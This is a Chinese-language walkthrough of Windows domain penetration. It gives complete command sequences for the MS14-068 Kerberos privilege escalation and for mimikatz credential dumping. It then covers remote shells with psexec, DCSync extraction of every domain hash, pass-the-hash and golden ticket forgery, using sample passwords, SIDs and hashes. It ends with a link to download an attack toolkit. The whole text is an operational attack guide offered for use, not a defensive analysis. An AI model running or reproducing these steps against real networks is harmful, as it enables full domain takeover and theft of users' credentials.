内网渗透-域渗透的记录

MS14-068漏洞提权（限制条件：打了补丁或者域中有Win2012/2012R2的域控）：
首先，需要拥有一台域内普通用户（假设为用户A）账户权限，知道此账户的账号密码。然后依次执行如下命令
1.
Ipconfig /all //查询本机IP段，所在域等；记录所在的域的名字

Net group “domain controllers” /domain 查看域控制器

所以所在的域全名 WIN-DTHKV3MCSKH.dc.com
2.
Klist purge //清除本机所有票证

Whoami /all //查询SID值 ，记录SID值

利用工具包中（工具包在文章末尾提供下载-内有详细的图文说明）的MS14-068.exe 执行如下命令
“ms14-068.exe -u [email protected] -p “1qaz@WSX” -s S-1-5-21-1382597820-942189592-943616189-1104 -d WIN-DTHKV3MCSKH.dc.com
-u 域用户名
-p 域用户密码
-s 记录的SID
-d 域控名字”
之后会在此软件同目录下生成一个名为[email protected] 的票证；

利用mimikatz将票证注入内存中：
mimikatz.exe “kerberos::ptc [email protected]” exit

验证 ：
net use \WIN-DTHKV3MCSKH.dc.com

dir \WIN-DTHKV3MCSKH.dc.com\c$ //命令行打开域控C盘

start \WIN-DTHKV3MCSKH.dc.com\c$ //打开域控C盘

HASH传递攻击：前提是被攻击的账号在其登陆的机器上有本地管理员的权限，并且开启了网络发现；原因是Windows的UAC安全机制过滤了没有权限的HASH
在拿到域控后，切换到用户A的本地管理员账户上执行（用户A的本地管理员）
mimikatz log //建立日志 方便复制信息

privilege::debug

sekurlsa::logonpasswords //获取本机信息（包含密码）

上图可以看到用户 lisi 的密码
将mimikatz拷贝到域控的磁盘里（可以用命令行，也可以start打开C盘拷贝），然后执行at命令创建远程任务运行上面三行命令获取到域控管理员的密码。
接下来使用Psexex
“psexec \192.168.17.138 -u Administrator -p !@#123QWE cmd”
创建一个具有域控管理权限的shell

然后使用mimikatz获取域控内所有成员的HASH：
先CD 到mimikatz所在的文件夹

然后执行mimikatz

获取权限：
privilege::debug

获取域控内HASH信息：
lsadump::dcsync /domain:dc.com /all /csv

执行：
privilege::debug
sekurlsa::pth /user:wangwu /domain:. /ntlm:161cff084477fe596a5db81874498a24

user后面是要攻击的账户名 domain 后面是所属域控 ntlm 是获取的HASH值

黄金票证生成：（利用Krbtgt信息，如果管理员更改密码，依然可以利用黄金票证获取管理权限）
执行mimikatz命令（在域控管理员下执行，或者在psexec返回的具有管理权限的shell下运行）：
“privilege::debug
lsadump::dcsync /domain:dc.com /user:krbtgt //获取krbtgt的信息”

然后执行（在用户A域用户下或者用户A本地管理员下）：
mimikatz “kerberos::golden /domain:dc.com /sid:S-1-5-21-1382597820-942189592-943616189 /aes256:ed2b13146d725834de8d265aaec74fad707b001d9f4a47a42bc0f954916c2a03 /user:god /ticket:gold.kirbi”

生成的票证名字为 gold.kirbi

注入票证获取权限：“kerberos::ptt gold.kirbi”

工具包下载地址 : https://pan.baidu.com/s/1bC2dUuL122IIvZqelicEuw 提取码: fs2u